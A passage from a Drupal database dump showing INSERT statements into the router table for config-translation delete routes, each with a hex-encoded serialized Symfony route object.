('config_translation.item.delete.entity.entity_form_mode.edit_form', '/admin/structure/display-modes/form/manage/{entity_form_mode}/translate/{langcode}/delete', '/admin/structure/display-modes/form/manage/%/translate/%/delete', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38393a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6d616e6167652f7b656e746974795f666f726d5f6d6f64657d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31363a22656e746974795f666f726d5f6d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a22656e746974795f666f726d5f6d6f6465223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a656e746974795f666f726d5f6d6f6465223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31363a22656e746974795f666f726d5f6d6f6465223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131373a227b5e2f61646d696e2f7374727563747572652f646973706c61795c2d6d6f6465732f666f726d2f6d616e6167652f283f503c656e746974795f666f726d5f6d6f64653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22656e746974795f666f726d5f6d6f6465223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31363a22656e746974795f666f726d5f6d6f6465223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36333a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.delete.entity.entity_view_mode.edit_form', '/admin/structure/display-modes/view/manage/{entity_view_mode}/translate/{langcode}/delete', '/admin/structure/display-modes/view/manage/%/translate/%/delete', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38393a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e6167652f7b656e746974795f766965775f6d6f64657d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31363a22656e746974795f766965775f6d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a22656e746974795f766965775f6d6f6465223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a656e746974795f766965775f6d6f6465223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31363a22656e746974795f766965775f6d6f6465223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131373a227b5e2f61646d696e2f7374727563747572652f646973706c61795c2d6d6f6465732f766965772f6d616e6167652f283f503c656e746974795f766965775f6d6f64653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22656e746974795f766965775f6d6f6465223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31363a22656e746974795f766965775f6d6f6465223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36333a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a393b7d7d, 9);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('config_translation.item.delete.entity.field_config.block_content_field_edit_form', '/admin/structure/block-content/manage/{block_content_type}/fields/{field_config}/translate/{langcode}/delete', '/admin/structure/block-content/manage/%/fields/%/translate/%/delete', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a3130383a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a32303a22626c6f636b5f636f6e74656e745f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3134363a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a36373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('config_translation.item.delete.entity.field_config.block_content_field_edit_form.bc', '/admin/structure/block/block-content/manage/{block_content_type}/fields/{field_config}/translate/{langcode}/delete', '/admin/structure/block/block-content/manage/%/fields/%/translate/%/delete', 2005, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a3131343a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a393a22706c7567696e5f6964223b733a32303a22626c6f636b5f636f6e74656e745f6669656c6473223b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3135323a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a323030353b733a31343a227061747465726e4f75746c696e65223b733a37333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a31313b7d7d, 11),
('config_translation.item.delete.entity.field_config.comment_field_edit_form', '/admin/structure/comment/manage/{comment_type}/fields/{field_config}/translate/{langcode}/delete', '/admin/structure/comment/manage/%/fields/%/translate/%/delete', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a39363a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31343a22636f6d6d656e745f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31323a22636f6d6d656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3133333a227b5e2f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f283f503c636f6d6d656e745f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6d6d656e745f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31323a22636f6d6d656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a36313a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('config_translation.item.delete.entity.field_config.contact_message_field_edit_form', '/admin/structure/contact/manage/{contact_form}/fields/{field_config}/translate/{langcode}/delete', '/admin/structure/contact/manage/%/fields/%/translate/%/delete', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a39363a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a32323a22636f6e746163745f6d6573736167655f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31323a22636f6e746163745f666f726d223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3133333a227b5e2f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f283f503c636f6e746163745f666f726d3e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6e746163745f666f726d223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31323a22636f6e746163745f666f726d223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a36313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('config_translation.item.delete.entity.field_config.media_field_edit_form', '/admin/structure/media/manage/{media_type}/fields/{field_config}/translate/{langcode}/delete', '/admin/structure/media/manage/%/fields/%/translate/%/delete', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a39323a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31323a226d656469615f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31303a226d656469615f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3132393a227b5e2f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f283f503c6d656469615f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656469612f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31303a226d656469615f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a35393a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
